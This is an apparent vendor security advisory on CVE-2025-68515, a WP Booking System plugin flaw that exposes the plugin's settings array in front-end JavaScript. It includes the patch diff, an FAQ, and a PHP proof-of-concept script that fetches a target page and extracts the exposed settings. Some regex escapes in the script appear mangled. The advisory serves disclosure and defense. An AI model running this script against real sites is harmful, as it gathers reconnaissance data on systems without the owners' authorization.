Atomic Edge analysis of CVE-2025-68515:
The vulnerability is an unauthenticated information exposure in the WP Booking System plugin. The root cause is the plugin exposing its full settings array to unauthenticated users via the wp_localize_script() function. This function call occurs in wpbs_enqueue_front_end_scripts() at line 487 of wp-booking-system.php. The plugin localizes the ‘wpbs-script’ JavaScript file, passing both a security token and the entire ‘$settings’ array to the client-side ‘wpbs_ajax’ object. The attack vector is passive observation of the plugin’s front-end JavaScript. An attacker can inspect the page source or browser developer tools on any page where the plugin loads its front-end script. The exposed ‘plugin_settings’ object contains sensitive configuration data, which may include user information or system details. The patch removes the ‘plugin_settings’ => $settings line from the wp_localize_script() call. This fix prevents the sensitive data from being transmitted to the client. Exploitation allows attackers to gather reconnaissance data about the WordPress installation and plugin configuration without authentication, facilitating further attacks.
CVE-2025-68515: WP Booking System – Booking Calendar <= 2.0.19.12 – Unauthenticated Information Exposure (wp-booking-system)
CVE-2025-68515
wp-booking-system
2.0.19.12
2.0.19.13
Analysis Overview
Differential between vulnerable and patched code
--- a/wp-booking-system/wp-booking-system.php
+++ b/wp-booking-system/wp-booking-system.php
@@ -3,7 +3,7 @@
* Plugin Name: WP Booking System
* Plugin URI: https://www.wpbookingsystem.com/
* Description: A set-and-forget booking calendar for your rental business.
- * Version: 2.0.19.12
+ * Version: 2.0.19.13
* Author: Veribo, Roland Murg
* Author URI: https://www.wpbookingsystem.com/
* Text Domain: wp-booking-system
@@ -61,7 +61,7 @@
{
// Defining constants
- define('WPBS_VERSION', '2.0.19.12');
+ define('WPBS_VERSION', '2.0.19.13');
define('WPBS_FILE', __FILE__);
define('WPBS_BASENAME', plugin_basename(__FILE__));
define('WPBS_PLUGIN_DIR', plugin_dir_path(__FILE__));
@@ -487,8 +487,7 @@
// Plugin script
wp_register_script('wpbs-script', WPBS_PLUGIN_DIR_URL . 'assets/js/script-front-end.min.js', array('jquery'), WPBS_VERSION, true);
wp_localize_script('wpbs-script', 'wpbs_ajax', array(
- 'token' => wp_create_nonce('wpbs_form_ajax'),
- 'plugin_settings' => $settings,
+ 'token' => wp_create_nonce('wpbs_form_ajax')
));
wp_enqueue_script('wpbs-script');Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68515 - WP Booking System – Booking Calendar <= 2.0.19.12 - Unauthenticated Information Exposure
<?php
$target_url = 'http://example.com/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200) {
// Search for the wpbs_ajax JavaScript object containing the exposed settings
if (preg_match('/wpbs_ajaxs*=s*({.*?});/s', $response, $matches)) {
$json_data = $matches[1];
// Clean the JSON string by removing the trailing comma before closing brace if present
$json_data = preg_replace('/,s*}/', '}', $json_data);
$data = json_decode($json_data, true);
if (json_last_error() === JSON_ERROR_NONE && isset($data['plugin_settings'])) {
echo "[+] Vulnerable plugin detected. Exposed settings:n";
echo json_encode($data['plugin_settings'], JSON_PRETTY_PRINT) . "n";
} else {
echo "[-] No exposed plugin settings found in response.n";
echo "[*] Raw wpbs_ajax object: " . substr($json_data, 0, 500) . "...n";
}
} else {
echo "[-] wpbs_ajax object not found in page source.n";
}
} else {
echo "[-] HTTP request failed with code: " . $http_code . "n";
}
?>Frequently Asked Questions
What is CVE-2025-68515?
Overview of the vulnerabilityCVE-2025-68515 is a medium-severity vulnerability found in the WP Booking System plugin for WordPress, specifically versions up to and including 2.0.19.12. It allows unauthenticated attackers to access sensitive configuration data through the plugin’s front-end JavaScript.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability arises from the plugin exposing its entire settings array to unauthenticated users via the wp_localize_script() function. This allows attackers to passively observe sensitive information by inspecting the front-end JavaScript loaded by the plugin.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the WP Booking System plugin version 2.0.19.12 or earlier is at risk. Site administrators should check their installed plugin version to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verificationTo check if your site is vulnerable, verify the version of the WP Booking System plugin installed on your WordPress site. If it is version 2.0.19.12 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the pluginThe vulnerability can be fixed by updating the WP Booking System plugin to version 2.0.19.13 or later. Ensure that you regularly check for updates to maintain security.
What does the CVSS score of 5.3 indicate?
Understanding severity levelsA CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it can still pose a significant risk. It is advisable to address such vulnerabilities promptly to mitigate potential exploitation.
What is sensitive information exposure?
Definition and implicationsSensitive information exposure occurs when an application inadvertently reveals confidential data to unauthorized users. In this case, it allows attackers to gather sensitive configuration details that could facilitate further attacks.
What does the proof of concept demonstrate?
Example of exploitationThe proof of concept provided illustrates how an attacker can use a simple script to send a request to a vulnerable site and extract the exposed wpbs_ajax JavaScript object containing sensitive settings. This demonstrates the ease with which an attacker can exploit the vulnerability.
What steps should I take after updating the plugin?
Post-update actionsAfter updating the plugin, it is important to monitor your site for any unusual activity and conduct a security audit. Additionally, review your site’s security practices to prevent future vulnerabilities.
Are there any additional security measures I should consider?
Enhancing overall securityIn addition to updating plugins, consider implementing security plugins, regular backups, and monitoring for suspicious activity. Educating users about security best practices can also help mitigate risks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategiesIf you cannot update the plugin immediately, consider disabling the plugin until a patch can be applied. Additionally, review access controls and limit exposure to the plugin’s functionality.
Where can I find more information about this vulnerability?
Resources for further readingMore information about CVE-2025-68515 can be found in the official CVE database and security advisories from WordPress security experts. Keeping abreast of security news is also beneficial for ongoing protection.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
